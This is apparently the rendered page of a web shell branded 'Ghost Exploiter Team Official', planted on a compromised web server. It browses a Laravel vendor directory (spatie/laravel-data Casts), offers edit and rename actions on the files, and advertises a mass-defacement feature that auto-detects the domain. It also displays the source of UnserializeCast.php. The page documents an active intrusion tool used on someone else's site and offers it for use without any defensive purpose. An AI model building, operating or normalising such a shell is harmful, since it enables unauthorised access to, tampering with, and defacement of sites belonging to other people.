Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
spatie
/
laravel-data
/
src
/
Casts
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
BuiltinTypeCast.php
1.289KB
edt
ren
Cast.php
0.337KB
edt
ren
Castable.php
0.176KB
edt
ren
CastableCast.php
1.081KB
edt
ren
DateTimeInterfaceCast.php
2.249KB
edt
ren
EnumCast.php
1.511KB
edt
ren
EnumerableCast.php
0.976KB
edt
ren
IterableItemCast.php
0.36KB
edt
ren
Uncastable.php
0.25KB
edt
ren
UnserializeCast.php
0.721KB
edt
ren
<?php namespace Spatie\LaravelData\Casts; use Spatie\LaravelData\Support\Creation\CreationContext; use Spatie\LaravelData\Support\DataProperty; class UnserializeCast implements Cast { public function __construct( private readonly bool $failSilently = false, ) { } public function cast(DataProperty $property, mixed $value, array $properties, CreationContext $context): mixed { /** @var ?string $value */ if ($value === null) { return null; } try { return unserialize($value); } catch (\Throwable $e) { if ($this->failSilently) { return Uncastable::create(); } throw $e; } } }
<=Back
Liking